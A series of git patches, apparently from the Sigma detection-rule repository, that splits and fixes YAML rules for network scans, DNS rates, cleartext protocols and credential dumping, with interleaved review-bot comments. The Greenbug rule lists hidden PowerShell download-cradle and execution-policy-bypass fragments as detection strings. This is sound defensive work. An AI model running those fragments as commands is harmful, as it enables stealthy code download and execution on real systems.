a/rules/windows/driver_load/driver_load_mal_creddumper.yml +++ b/rules/windows/driver_load/driver_load_mal_creddumper.yml @@ -6,7 +6,7 @@ related: description: Detects well-known credential dumping tools execution via service execution events author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community date: 2017/03/05 -modified: 2021/03/18 +modified: 2021/09/21 references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment tags: From 00f3055035d0a6ca6d41fbba4a4e7ccd48c0d8ee Mon Sep 17 00:00:00 2001 
From: frack113 Date: Tue, 21 Sep 2021 19:47:28 +0200 Subject: [PATCH 1035/1367] split global net_susp_network_scan.yml --- rules/network/net_susp_network_scan_by_ip.yml | 26 +++++++++++++++ ....yml => net_susp_network_scan_by_port.yml} | 33 +++++++------------ 2 files changed, 38 insertions(+), 21 deletions(-) create mode 100644 rules/network/net_susp_network_scan_by_ip.yml rename rules/network/{net_susp_network_scan.yml => net_susp_network_scan_by_port.yml} (69%) diff --git a/rules/network/net_susp_network_scan_by_ip.yml b/rules/network/net_susp_network_scan_by_ip.yml new file mode 100644 index 00000000..518b5d68 --- /dev/null +++ b/rules/network/net_susp_network_scan_by_ip.yml @@ -0,0 +1,26 @@ +title: Network Scans Count By Destination IP +id: 4601eaec-6b45-4052-ad32-2d96d26ce0d8 +status: experimental +description: Detects many failed connection attempts to different ports or hosts +author: Thomas Patzke +date: 2017/02/19 +modified: 2020/08/27 +logsource: + category: firewall +tags: + - attack.discovery + - attack.t1046 +detection: + selection: + action: denied + timeframe: 24h + condition: selection | count(dst_ip) by src_ip > 10 +falsepositives: + - Inventarization systems + - Vulnerability scans + - Penetration testing activity +level: medium +fields: + - src_ip + - dst_ip + - dst_port \ No newline at end of file diff --git a/rules/network/net_susp_network_scan.yml b/rules/network/net_susp_network_scan_by_port.yml similarity index 69% rename from rules/network/net_susp_network_scan.yml rename to rules/network/net_susp_network_scan_by_port.yml index a4032fda..e3cc1f86 100644 --- a/rules/network/net_susp_network_scan.yml +++ b/rules/network/net_susp_network_scan_by_port.yml 
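Review bot: The new net_susp_network_scan_by_ip.yml keeps `modified: 2020/08/27` although it is created by this split, whereas the sibling net_susp_network_scan_by_port.yml in the same commit is bumped to `modified: 2021/09/21`; both halves should carry the same date, as the other splits in this series do. The falsepositives entry `Inventarization systems`, carried over into both files, is a misspelling of `Inventory systems`.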
@@ -1,35 +1,26 @@ -action: global -title: Network Scans +title: Network Scans Count By Destination Port +id: fab0ddf0-b8a9-4d70-91ce-a20547209afb status: experimental description: Detects many failed connection attempts to different ports or hosts author: Thomas Patzke date: 2017/02/19 -modified: 2020/08/27 +modified: 2021/09/21 logsource: category: firewall -fields: - - src_ip - - dst_ip - - dst_port -falsepositives: - - Inventarization systems - - Vulnerability scans - - Penetration testing activity -level: medium tags: - attack.discovery - attack.t1046 ---- -id: fab0ddf0-b8a9-4d70-91ce-a20547209afb detection: selection: action: denied timeframe: 24h condition: selection | count(dst_port) by src_ip > 10 ---- -id: 4601eaec-6b45-4052-ad32-2d96d26ce0d8 -detection: - selection: - action: denied - timeframe: 24h - condition: selection | count(dst_ip) by src_ip > 10 \ No newline at end of file +falsepositives: + - Inventarization systems + - Vulnerability scans + - Penetration testing activity +level: medium +fields: + - src_ip + - dst_ip + - dst_port \ No newline at end of file From 6777ca7a825c90a2c72e858d58fe13b1f10cdc34 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 19:51:11 +0200 Subject: [PATCH 1036/1367] split global net_high_dns_requests_rate.yml --- .../net_firewall_high_dns_requests_rate.yml | 24 +++++++++++++++++++ rules/network/net_high_dns_requests_rate.yml | 21 ++++------------ 2 files changed, 29 insertions(+), 16 deletions(-) create mode 100644 rules/network/net_firewall_high_dns_requests_rate.yml diff --git a/rules/network/net_firewall_high_dns_requests_rate.yml b/rules/network/net_firewall_high_dns_requests_rate.yml new file mode 100644 index 00000000..843c080a --- /dev/null +++ b/rules/network/net_firewall_high_dns_requests_rate.yml 
@@ -0,0 +1,24 @@ +title: High DNS Requests Rate +id: 51186749-7415-46be-90e5-6914865c825a +status: experimental +description: High DNS requests amount from host per short period of time +author: Daniil Yugoslavskiy, oscd.community +date: 2019/10/24 +modified: 2021/09/21 +tags: + - attack.exfiltration + - attack.t1048 # an old one + - attack.t1048.003 + - attack.command_and_control + - attack.t1071 # an old one + - attack.t1071.004 +logsource: + category: firewall +detection: + selection: + dst_port: 53 + timeframe: 1m + condition: selection | count() by src_ip > 1000 +falsepositives: + - Legitimate high DNS requests rate to domain name which should be added to whitelist +level: medium \ No newline at end of file diff --git a/rules/network/net_high_dns_requests_rate.yml b/rules/network/net_high_dns_requests_rate.yml index c870aacf..da872771 100644 --- a/rules/network/net_high_dns_requests_rate.yml +++ b/rules/network/net_high_dns_requests_rate.yml @@ -1,13 +1,10 @@ -action: global title: High DNS Requests Rate +id: b4163085-4001-46a3-a79a-55d8bbbc7a3a status: experimental description: High DNS requests amount from host per short period of time author: Daniil Yugoslavskiy, oscd.community date: 2019/10/24 -modified: 2020/08/27 -falsepositives: - - Legitimate high DNS requests rate to domain name which should be added to whitelist -level: medium +modified: 2021/09/21 tags: - attack.exfiltration - attack.t1048 # an old one @@ -15,8 +12,6 @@ tags: - attack.command_and_control - attack.t1071 # an old one - attack.t1071.004 ---- -id: b4163085-4001-46a3-a79a-55d8bbbc7a3a logsource: category: dns detection: 
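Review bot: After the split both files carry the identical `title: High DNS Requests Rate`, so alerts from the firewall rule and the dns rule are indistinguishable by title and a duplicate-title check cannot tell them apart; the network-scan split in PATCH 1035 disambiguates its halves ("Count By Destination IP" / "Count By Destination Port"), and this one should too, e.g. `title: High DNS Requests Rate (Firewall)` here and `title: High DNS Requests Rate (DNS)` in net_high_dns_requests_rate.yml. The same duplicate-title pattern appears in PATCH 1037 (High DNS Bytes Out, both files) and PATCH 1038 (Cleartext Protocol Usage, both files). Note also that `dst_port: 53` on the firewall side counts every flow to port 53 regardless of protocol, so an internal resolver or forwarder will exceed 1000 per minute routinely; the falsepositives entry should name internal DNS servers explicitly rather than only "domain name which should be added to whitelist".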
@@ -24,12 +19,6 @@ detection: query: '*' timeframe: 1m condition: selection | count() by src_ip > 1000 ---- -id: 51186749-7415-46be-90e5-6914865c825a -logsource: - category: firewall -detection: - selection: - dst_port: 53 - timeframe: 1m - condition: selection | count() by src_ip > 1000 +falsepositives: + - Legitimate high DNS requests rate to domain name which should be added to whitelist +level: medium \ No newline at end of file From e377e4e96ff99d215c0be27b79212ef356d6d036 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 19:53:25 +0200 Subject: [PATCH 1037/1367] split global net_high_dns_bytes_out.yml --- .../net_firewall_high_dns_bytes_out.yml | 21 +++++++++++++++++++ rules/network/net_high_dns_bytes_out.yml | 21 +++++-------------- 2 files changed, 26 insertions(+), 16 deletions(-) create mode 100644 rules/network/net_firewall_high_dns_bytes_out.yml diff --git a/rules/network/net_firewall_high_dns_bytes_out.yml b/rules/network/net_firewall_high_dns_bytes_out.yml new file mode 100644 index 00000000..afe5e839 --- /dev/null +++ b/rules/network/net_firewall_high_dns_bytes_out.yml @@ -0,0 +1,21 @@ +title: High DNS Bytes Out +id: 3b6e327d-8649-4102-993f-d25786481589 +status: experimental +description: High DNS queries bytes amount from host per short period of time +author: Daniil Yugoslavskiy, oscd.community +date: 2019/10/24 +modified: 2021/09/21 +tags: + - attack.exfiltration + - attack.t1048 # an old one + - attack.t1048.003 +logsource: + category: firewall +detection: + selection: + dst_port: 53 + timeframe: 1m + condition: selection | sum(message_size) by src_ip > 300000 +falsepositives: + - Legitimate high DNS bytes out rate to domain name which should be added to whitelist +level: medium \ No newline at end of file diff --git a/rules/network/net_high_dns_bytes_out.yml b/rules/network/net_high_dns_bytes_out.yml index babf0d21..193bfcdf 100644 --- a/rules/network/net_high_dns_bytes_out.yml +++ b/rules/network/net_high_dns_bytes_out.yml 
@@ -1,19 +1,14 @@ -action: global title: High DNS Bytes Out +id: 0f6c1bf5-70a5-4963-aef9-aab1eefb50bd status: experimental description: High DNS queries bytes amount from host per short period of time author: Daniil Yugoslavskiy, oscd.community date: 2019/10/24 -modified: 2020/08/27 -falsepositives: - - Legitimate high DNS bytes out rate to domain name which should be added to whitelist -level: medium +modified: 2021/09/21 tags: - attack.exfiltration - attack.t1048 # an old one - attack.t1048.003 ---- -id: 0f6c1bf5-70a5-4963-aef9-aab1eefb50bd logsource: category: dns detection: @@ -21,12 +16,6 @@ detection: query: '*' timeframe: 1m condition: selection | sum(question_length) by src_ip > 300000 ---- -id: 3b6e327d-8649-4102-993f-d25786481589 -logsource: - category: firewall -detection: - selection: - dst_port: 53 - timeframe: 1m - condition: selection | sum(message_size) by src_ip > 300000 +falsepositives: + - Legitimate high DNS bytes out rate to domain name which should be added to whitelist +level: medium \ No newline at end of file From 7a52da3b4090efc48d8e9e89279e1f889ff28f2c Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 19:56:47 +0200 Subject: [PATCH 1038/1367] split global cleartext_protocols.yml --- ...s.yml => firewall_cleartext_protocols.yml} | 34 +------- .../netflow_cleartext_protocols.yml | 79 +++++++++++++++++++ 2 files changed, 83 insertions(+), 30 deletions(-) rename rules/compliance/{cleartext_protocols.yml => firewall_cleartext_protocols.yml} (82%) create mode 100644 rules/compliance/netflow_cleartext_protocols.yml diff --git a/rules/compliance/cleartext_protocols.yml b/rules/compliance/firewall_cleartext_protocols.yml similarity index 82% rename from rules/compliance/cleartext_protocols.yml rename to rules/compliance/firewall_cleartext_protocols.yml index e50e0ea2..77b309b2 100644 --- a/rules/compliance/cleartext_protocols.yml +++ b/rules/compliance/firewall_cleartext_protocols.yml 
@@ -1,5 +1,5 @@ -action: global title: Cleartext Protocol Usage +id: d7fb8f0e-bd5f-45c2-b467-19571c490d7e status: stable description: Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access. @@ -9,9 +9,6 @@ references: - https://www.cisecurity.org/controls/cis-controls-list/ - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf -falsepositives: - - unknown -level: low # tags: # - CSC4 # - CSC4.5 @@ -55,32 +52,6 @@ level: low # - PCI DSS 3.2 7.1 # - PCI DSS 3.2 7.2 # - PCI DSS 3.2 7.3 ---- -id: 7e4bfe58-4a47-4709-828d-d86c78b7cc1f -logsource: - product: netflow -detection: - selection: - destination.port: - - 8080 - - 21 - - 80 - - 23 - - 50000 - - 1521 - - 27017 - - 1433 - - 11211 - - 3306 - - 15672 - - 5900 - - 5901 - - 5902 - - 5903 - - 5904 - condition: selection ---- -id: d7fb8f0e-bd5f-45c2-b467-19571c490d7e logsource: category: firewall detection: @@ -108,3 +79,6 @@ detection: - accept - 2 condition: selection1 AND selection2 +falsepositives: + - unknown +level: low \ No newline at end of file diff --git a/rules/compliance/netflow_cleartext_protocols.yml b/rules/compliance/netflow_cleartext_protocols.yml new file mode 100644 index 00000000..455d225c --- /dev/null +++ b/rules/compliance/netflow_cleartext_protocols.yml 
@@ -0,0 +1,79 @@ +title: Cleartext Protocol Usage +id: 7e4bfe58-4a47-4709-828d-d86c78b7cc1f +status: stable +description: Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that an encryption + is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access. +author: Alexandr Yampolskyi, SOC Prime +date: 2019/03/26 +references: + - https://www.cisecurity.org/controls/cis-controls-list/ + - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf + - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf +# tags: + # - CSC4 + # - CSC4.5 + # - CSC14 + # - CSC14.4 + # - CSC16 + # - CSC16.5 + # - NIST CSF 1.1 PR.AT-2 + # - NIST CSF 1.1 PR.MA-2 + # - NIST CSF 1.1 PR.PT-3 + # - NIST CSF 1.1 PR.AC-1 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AC-5 + # - NIST CSF 1.1 PR.AC-6 + # - NIST CSF 1.1 PR.AC-7 + # - NIST CSF 1.1 PR.DS-1 + # - NIST CSF 1.1 PR.DS-2 + # - ISO 27002-2013 A.9.2.1 + # - ISO 27002-2013 A.9.2.2 + # - ISO 27002-2013 A.9.2.3 + # - ISO 27002-2013 A.9.2.4 + # - ISO 27002-2013 A.9.2.5 + # - ISO 27002-2013 A.9.2.6 + # - ISO 27002-2013 A.9.3.1 + # - ISO 27002-2013 A.9.4.1 + # - ISO 27002-2013 A.9.4.2 + # - ISO 27002-2013 A.9.4.3 + # - ISO 27002-2013 A.9.4.4 + # - ISO 27002-2013 A.8.3.1 + # - ISO 27002-2013 A.9.1.1 + # - ISO 27002-2013 A.10.1.1 + # - PCI DSS 3.2 2.1 + # - PCI DSS 3.2 8.1 + # - PCI DSS 3.2 8.2 + # - PCI DSS 3.2 8.3 + # - PCI DSS 3.2 8.7 + # - PCI DSS 3.2 8.8 + # - PCI DSS 3.2 1.3 + # - PCI DSS 3.2 1.4 + # - PCI DSS 3.2 4.3 + # - PCI DSS 3.2 7.1 + # - PCI DSS 3.2 7.2 + # - PCI DSS 3.2 7.3 +logsource: + product: netflow +detection: + selection: + destination.port: + - 8080 + - 21 + - 80 + - 23 + - 50000 + - 1521 + - 27017 + - 1433 + - 11211 + - 3306 + - 15672 + - 5900 + - 5901 + - 5902 + - 5903 + - 5904 + condition: selection +falsepositives: + - unknown +level: low \ No newline at end 
of file From 6e08ba55c4e75a9b0a90fc75136bae60a94a9771 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 20:16:26 +0200 Subject: [PATCH 1039/1367] fix error --- rules/compliance/firewall_cleartext_protocols.yml | 2 +- ...curity_metasploit_or_impacket_smb_psexec_service_install.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/compliance/firewall_cleartext_protocols.yml b/rules/compliance/firewall_cleartext_protocols.yml index 77b309b2..c4e9d253 100644 --- a/rules/compliance/firewall_cleartext_protocols.yml +++ b/rules/compliance/firewall_cleartext_protocols.yml @@ -78,7 +78,7 @@ detection: - forward - accept - 2 - condition: selection1 AND selection2 + condition: selection1 and selection2 falsepositives: - unknown level: low \ No newline at end of file diff --git a/rules/windows/builtin/win_security_metasploit_or_impacket_smb_psexec_service_install.yml b/rules/windows/builtin/win_security_metasploit_or_impacket_smb_psexec_service_install.yml index 8ad72acf..e76b4c2e 100644 --- a/rules/windows/builtin/win_security_metasploit_or_impacket_smb_psexec_service_install.yml +++ b/rules/windows/builtin/win_security_metasploit_or_impacket_smb_psexec_service_install.yml @@ -1,5 +1,5 @@ title: Metasploit Or Impacket Service Installation Via SMB PsExec -id: 6fb63b40-e02a-403e-9ffd-3bcc1d7494425 +id: 6fb63b40-e02a-403e-9ffd-3bcc1d749442 related: - id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 type: derived From db9e6124e3018b705339ec14b9a31baaa5918971 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 20:24:02 +0200 Subject: [PATCH 1040/1367] fix too many blank lines --- rules/windows/builtin/win_security_mal_creddumper.yml | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/rules/windows/builtin/win_security_mal_creddumper.yml b/rules/windows/builtin/win_security_mal_creddumper.yml index d3053669..d6d823e6 100644 --- a/rules/windows/builtin/win_security_mal_creddumper.yml 
+++ b/rules/windows/builtin/win_security_mal_creddumper.yml @@ -38,7 +38,4 @@ detection: condition: selection falsepositives: - Legitimate Administrator using credential dumping tool for password recovery -level: high - - - +level: high \ No newline at end of file From e16e9e8ea7e275d0704b44533a97cdc59aa8d3c4 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 22:54:45 +0200 Subject: [PATCH 1041/1367] fix timeframe compare error --- tests/test_rules.py | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index d4f2e0ef..b9dd2483 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -181,13 +181,17 @@ class TestRules(unittest.TestCase): return False for named_condition in detection1: + #don't check timeframes + if named_condition == "timeframe": + continue + # condition clause must be the same too if named_condition == "condition": if detection1["condition"] != detection2["condition"]: return False else: continue - + # Named condition must exist in both rule files if named_condition not in detection2: return False From 993bf465501ebea0fcd259074adb817a9c4d0c42 Mon Sep 17 00:00:00 2001 From: unknown Date: Tue, 21 Sep 2021 16:56:01 -0400 Subject: [PATCH 1042/1367] win-apt-greenbug-fix small change to B64encoded value of '/server=' in detection criteria --- rules/windows/process_creation/win_apt_greenbug_may20.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_apt_greenbug_may20.yml b/rules/windows/process_creation/win_apt_greenbug_may20.yml index ffae0327..6f1678a1 100644 --- a/rules/windows/process_creation/win_apt_greenbug_may20.yml +++ b/rules/windows/process_creation/win_apt_greenbug_may20.yml 
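Review bot: Skipping `timeframe` entirely makes two detections that differ only in their aggregation window compare as equal, and because only the keys of `detection1` are iterated, a `timeframe` present solely in `detection2` is never seen either; if the intent is just to keep the structural comparison below from choking on the scalar value, compare it directly instead: `if named_condition == "timeframe":` / `    if detection1["timeframe"] != detection2.get("timeframe"): return False` / `    continue`. The comment should also read `# don't check timeframes` (space after `#`, PEP 8). The enclosing method starts before this hunk, so I cannot see whether an earlier key-count check already covers the asymmetric case.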
@@ -39,7 +39,7 @@ detection: - ' -nop -w hidden -c $m=new-object net.webclient;$m' - '-noninteractive -executionpolicy bypass whoami' - '-noninteractive -executionpolicy bypass netstat -a' - - 'L3NlcnZlc' # base64 encoded '/server=' + - 'L3NlcnZlcj0=' # base64 encoded '/server=' selection4: Image|endswith: - '\adobe\Adobe.exe' From 3ace73f9fd4226977c241470032e7fdd5e22842c Mon Sep 17 00:00:00 2001 From: unknown Date: Tue, 21 Sep 2021 16:59:32 -0400 Subject: [PATCH 1043/1367] win-apt-greenbug-fix - change modified date as well --- rules/windows/process_creation/win_apt_greenbug_may20.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_apt_greenbug_may20.yml b/rules/windows/process_creation/win_apt_greenbug_may20.yml index 6f1678a1..e3f03715 100644 --- a/rules/windows/process_creation/win_apt_greenbug_may20.yml +++ b/rules/windows/process_creation/win_apt_greenbug_may20.yml @@ -6,7 +6,7 @@ references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia author: Florian Roth date: 2020/05/20 -modified: 2020/08/27 +modified: 2021/09/21 tags: - attack.g0049 - attack.execution From 045e87058b00aecd534e76fa9e9b966eaa1b5182 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 22 Sep 2021 08:40:08 +0200 Subject: [PATCH 1044/1367] add definition --- .../powershell_memorydump_getstoragediagnosticinfo.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml b/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml index c31fc802..79ef1050 100644 --- a/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml +++ b/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml 
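Review bot: The new literal `L3NlcnZlcj0=` carries the trailing padding, which only occurs when `/server=` is the very last bytes of the encoded data; in a real command the argument value follows it and the last characters become `cj0`, `cj1`, `cj2` or `cj3`, so this change narrows the match and will miss the usual case, whereas the old prefix `L3NlcnZlc` matched any continuation. A fixed literal also covers only one of the three base64 alignments of the substring, and if the payload is a PowerShell `-EncodedCommand` the bytes are UTF-16LE, which an ASCII encoding never matches. The repository already uses the `base64offset` modifier for exactly this (see the `ServiceFileName|base64offset|contains` selections in PATCH 1033), so the robust form is a separate selection such as `CommandLine|base64offset|contains: '/server='` (with `utf16le` in front of `base64offset` for the encoded-command case); the field name and modifier of this list are above the hunk, so I am assuming it is `CommandLine|contains`. If the literal must stay, `'L3NlcnZlcj'` is the longest alignment-0 prefix that does not depend on what follows.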
@@ -11,6 +11,7 @@ author: Max Altgelt logsource: product: windows service: powershell + definition: Script block logging must be enabled detection: dump: EventID: 4104 From b7b0bd427546816dcfd5f19b049030611d738a00 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 22 Sep 2021 09:46:05 +0200 Subject: [PATCH 1045/1367] Update lnx_clear_syslog.yml --- rules/linux/lnx_clear_syslog.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/linux/lnx_clear_syslog.yml b/rules/linux/lnx_clear_syslog.yml index 1c01a3a5..ac9fa13c 100644 --- a/rules/linux/lnx_clear_syslog.yml +++ b/rules/linux/lnx_clear_syslog.yml @@ -6,6 +6,9 @@ author: Max Altgelt date: 2021/09/10 references: - https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474 +tags: + - attack.impact + - attack.t1565.001 logsource: product: linux detection: @@ -23,5 +26,3 @@ detection: falsepositives: - Log rotation level: high -tags: - - attack.persistence From edb19013d518e74e9e665acee9643305abca58a5 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 22 Sep 2021 16:11:29 +0200 Subject: [PATCH 1046/1367] fix test_file_names --- tests/test_rules.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index d4f2e0ef..ebdbfa27 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -522,7 +522,7 @@ class TestRules(unittest.TestCase): filename_pattern = re.compile('[a-z0-9_]{10,70}\.yml') for file in self.yield_next_rule_file_path(self.path_to_rules): filename = os.path.basename(file) - if not filename_pattern.match(filename) and not '_' in filename: + if filename_pattern.match(filename) == None or not '_' in filename: print(Fore.YELLOW + "Rule {} has a file name that doesn't match our standard.".format(file)) faulty_rules.append(file) From 3c906b52a022354cbc2104103e8893c8e84819c6 Mon Sep 17 00:00:00 2001 
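Review bot: `attack.t1565.001` (Data Manipulation: Stored Data Manipulation) is not the technique that describes clearing syslog; ATT&CK files log clearing on Linux under Indicator Removal, `attack.t1070.002` (Clear Linux or Mac System Logs) with tactic `attack.defense_evasion`, so the added tags in lnx_clear_syslog.yml should be `- attack.defense_evasion` / `- attack.t1070.002`. Dropping the old `attack.persistence` tag in the second hunk is right, but the replacement still misclassifies the behaviour. The detection block itself lies outside both hunks.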
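Review bot: The new condition in test_rules.py compares against `None` with `==`; use identity and put the negation on the operator: `if filename_pattern.match(filename) is None or '_' not in filename:`. Separately, the unchanged compile line above uses a non-raw string (`'[a-z0-9_]{10,70}\.yml'`) in which `\.` is an invalid escape sequence that newer Pythons warn about, and `match` only anchors the start, so the pattern is worth tightening to `re.compile(r'[a-z0-9_]{10,70}\.yml')` with `fullmatch` once this test is revisited. The enclosing test method starts before this hunk.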
From: frack113 Date: Wed, 22 Sep 2021 16:21:07 +0200 Subject: [PATCH 1047/1367] fix filename --- ...mation.yml => gcp_dlp_re_identifies_sensitive_information.yml} | 0 ...ml => okta_application_sign_on_policy_modified_or_deleted.yml} | 0 ...r_enumeration.yml => zeek_dce_rpc_domain_user_enumeration.yml} | 0 ...cure_cve-2019-11510.yml => web_pulsesecure_cve_2019_11510.yml} | 0 ...lip+_services.yml => win_invoke_obfuscation_clip_services.yml} | 0 ...rity.yml => win_invoke_obfuscation_clip_services_security.yml} | 0 ..._var+_services.yml => win_invoke_obfuscation_var_services.yml} | 0 ...urity.yml => win_invoke_obfuscation_var_services_security.yml} | 0 ...+_services.yml => win_invoke_obfuscation_via_var_services.yml} | 0 ...y.yml => win_invoke_obfuscation_via_var_services_security.yml} | 0 ...event_winrm_AWL_bypass.yml => file_event_winrm_awl_bypass.yml} | 0 ...fuscation_clip+.yml => powershell_invoke_obfuscation_clip.yml} | 0 ...obfuscation_var+.yml => powershell_invoke_obfuscation_var.yml} | 0 ...on_via_var++.yml => powershell_invoke_obfuscation_via_var.yml} | 0 ...invoke_obfuscation_var+.yml => win_invoke_obfuscation_var.yml} | 0 ...fuscation_via_var++.yml => win_invoke_obfuscation_via_var.yml} | 0 ...in_susp_winrm_AWL_bypass.yml => win_susp_winrm_awl_bypass.yml} | 0 17 files changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/gcp/{gcp_dlp_re-identifies_sensitive_information.yml => gcp_dlp_re_identifies_sensitive_information.yml} (100%) rename rules/cloud/okta/{okta_application_sign-on_policy_modified_or_deleted.yml => okta_application_sign_on_policy_modified_or_deleted.yml} (100%) rename rules/network/zeek/{zeek-dce_rpc_domain_user_enumeration.yml => zeek_dce_rpc_domain_user_enumeration.yml} (100%) rename rules/web/{web_pulsesecure_cve-2019-11510.yml => web_pulsesecure_cve_2019_11510.yml} (100%) rename rules/windows/builtin/{win_invoke_obfuscation_clip+_services.yml => win_invoke_obfuscation_clip_services.yml} (100%) rename 
rules/windows/builtin/{win_invoke_obfuscation_clip+_services_security.yml => win_invoke_obfuscation_clip_services_security.yml} (100%) rename rules/windows/builtin/{win_invoke_obfuscation_var+_services.yml => win_invoke_obfuscation_var_services.yml} (100%) rename rules/windows/builtin/{win_invoke_obfuscation_var+_services_security.yml => win_invoke_obfuscation_var_services_security.yml} (100%) rename rules/windows/builtin/{win_invoke_obfuscation_via_var++_services.yml => win_invoke_obfuscation_via_var_services.yml} (100%) rename rules/windows/builtin/{win_invoke_obfuscation_via_var++_services_security.yml => win_invoke_obfuscation_via_var_services_security.yml} (100%) rename rules/windows/file_event/{file_event_winrm_AWL_bypass.yml => file_event_winrm_awl_bypass.yml} (100%) rename rules/windows/powershell/{powershell_invoke_obfuscation_clip+.yml => powershell_invoke_obfuscation_clip.yml} (100%) rename rules/windows/powershell/{powershell_invoke_obfuscation_var+.yml => powershell_invoke_obfuscation_var.yml} (100%) rename rules/windows/powershell/{powershell_invoke_obfuscation_via_var++.yml => powershell_invoke_obfuscation_via_var.yml} (100%) rename rules/windows/process_creation/{win_invoke_obfuscation_var+.yml => win_invoke_obfuscation_var.yml} (100%) rename rules/windows/process_creation/{win_invoke_obfuscation_via_var++.yml => win_invoke_obfuscation_via_var.yml} (100%) rename rules/windows/process_creation/{win_susp_winrm_AWL_bypass.yml => win_susp_winrm_awl_bypass.yml} (100%) diff --git a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml b/rules/cloud/gcp/gcp_dlp_re_identifies_sensitive_information.yml similarity index 100% rename from rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml rename to rules/cloud/gcp/gcp_dlp_re_identifies_sensitive_information.yml 
diff --git a/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml similarity index 100% rename from rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml rename to rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml diff --git a/rules/network/zeek/zeek-dce_rpc_domain_user_enumeration.yml b/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml similarity index 100% rename from rules/network/zeek/zeek-dce_rpc_domain_user_enumeration.yml rename to rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml diff --git a/rules/web/web_pulsesecure_cve-2019-11510.yml b/rules/web/web_pulsesecure_cve_2019_11510.yml similarity index 100% rename from rules/web/web_pulsesecure_cve-2019-11510.yml rename to rules/web/web_pulsesecure_cve_2019_11510.yml diff --git a/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_clip_services.yml similarity index 100% rename from rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml rename to rules/windows/builtin/win_invoke_obfuscation_clip_services.yml diff --git a/rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_clip_services_security.yml similarity index 100% rename from rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml rename to rules/windows/builtin/win_invoke_obfuscation_clip_services_security.yml diff --git a/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_var_services.yml similarity index 100% rename from rules/windows/builtin/win_invoke_obfuscation_var+_services.yml rename to rules/windows/builtin/win_invoke_obfuscation_var_services.yml 
diff --git a/rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_var_services_security.yml similarity index 100% rename from rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml rename to rules/windows/builtin/win_invoke_obfuscation_var_services_security.yml diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_var_services.yml similarity index 100% rename from rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml rename to rules/windows/builtin/win_invoke_obfuscation_via_var_services.yml diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_var_services_security.yml similarity index 100% rename from rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml rename to rules/windows/builtin/win_invoke_obfuscation_via_var_services_security.yml diff --git a/rules/windows/file_event/file_event_winrm_AWL_bypass.yml b/rules/windows/file_event/file_event_winrm_awl_bypass.yml similarity index 100% rename from rules/windows/file_event/file_event_winrm_AWL_bypass.yml rename to rules/windows/file_event/file_event_winrm_awl_bypass.yml diff --git 